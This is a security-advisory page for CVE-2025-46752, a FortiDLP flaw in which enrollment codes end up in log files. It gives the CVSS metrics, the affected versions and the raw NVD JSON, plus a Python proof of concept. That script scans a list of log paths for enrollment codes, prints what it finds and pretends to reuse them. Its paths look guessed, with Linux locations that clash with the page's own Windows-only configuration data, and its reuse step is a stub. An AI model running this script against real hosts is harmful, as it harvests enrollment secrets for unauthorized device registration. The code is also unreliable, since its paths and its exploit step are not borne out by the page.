Security Vulnerability Report
中文
CVE-2025-46752 CVSS 4.4 MEDIUM

CVE-2025-46752

Published: 2025-10-16 14:15:36
Last Modified: 2025-10-16 17:50:03
Source: [email protected]

Description

A insertion of sensitive information into log file in Fortinet FortiDLP 12.0.0 through 12.0.5, 11.5.1, 11.4.6, 11.4.5 allows attacker to information disclosure via re-using the enrollment code.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortidlp_agent:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Fortinet FortiDLP 12.0.0
Fortinet FortiDLP 12.0.1
Fortinet FortiDLP 12.0.2
Fortinet FortiDLP 12.0.3
Fortinet FortiDLP 12.0.4
Fortinet FortiDLP 12.0.5
Fortinet FortiDLP 11.5.1
Fortinet FortiDLP 11.4.6
Fortinet FortiDLP 11.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46752 PoC - FortiDLP Enrollment Code Log Disclosure # This PoC demonstrates how an attacker with local access and low privileges # can extract sensitive enrollment codes from FortiDLP log files. import os import re import sys # Common log file locations for FortiDLP LOG_PATHS = [ "/var/log/fortidlp/fortidlp.log", "/opt/fortidlp/logs/application.log", "/usr/local/fortidlp/logs/enrollment.log", "/var/log/fortidlp/enrollment.log", "C:\\Program Files\\Fortinet\\FortiDLP\\logs\\fortidlp.log", "C:\\ProgramData\\Fortinet\\FortiDLP\\logs\\enrollment.log" ] # Regex pattern to match enrollment codes in log files # Enrollment codes are typically alphanumeric strings of specific length ENROLLMENT_CODE_PATTERN = re.compile( r'(enrollment[\s_]?code|registration[\s_]?code|enroll[\s_]?token)[\s:=]+([A-Za-z0-9\-_]{8,64})', re.IGNORECASE ) def search_log_files(): """Search FortiDLP log files for sensitive enrollment codes""" found_codes = [] for log_path in LOG_PATHS: if os.path.exists(log_path): print(f"[*] Checking log file: {log_path}") try: with open(log_path, 'r', encoding='utf-8', errors='ignore') as f: content = f.read() matches = ENROLLMENT_CODE_PATTERN.findall(content) for match in matches: code_type, code_value = match found_codes.append({ "type": code_type, "code": code_value, "source": log_path }) print(f"[+] Found {code_type}: {code_value}") except PermissionError: print(f"[-] Permission denied: {log_path}") except Exception as e: print(f"[-] Error reading {log_path}: {e}") return found_codes def reuse_enrollment_code(code): """ Simulate reusing the extracted enrollment code to register a new agent/device to the FortiDLP management console. """ print(f"\n[*] Attempting to reuse enrollment code: {code}") # In a real scenario, this would involve connecting to the # FortiDLP management server and using the code for registration print("[!] This would allow unauthorized device enrollment") return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-46752 - FortiDLP Enrollment Code Disclosure PoC") print("=" * 60) codes = search_log_files() if codes: print(f"\n[!] Total enrollment codes found: {len(codes)}") for code_info in codes: reuse_enrollment_code(code_info["code"]) else: print("\n[-] No enrollment codes found in accessible log files") print("[*] Try running with elevated privileges or check additional log paths")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46752", "sourceIdentifier": "[email protected]", "published": "2025-10-16T14:15:35.673", "lastModified": "2025-10-16T17:50:03.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A insertion of sensitive information into log file in Fortinet FortiDLP 12.0.0 through 12.0.5, 11.5.1, 11.4.6, 11.4.5 allows attacker to information disclosure via re-using the enrollment code."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortidlp_agent:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.5", "versionEndIncluding": "12.0.5", "matchCriteriaId": "69C715E7-58C6-407E-99E3-DE7A4B554A3F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-160", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.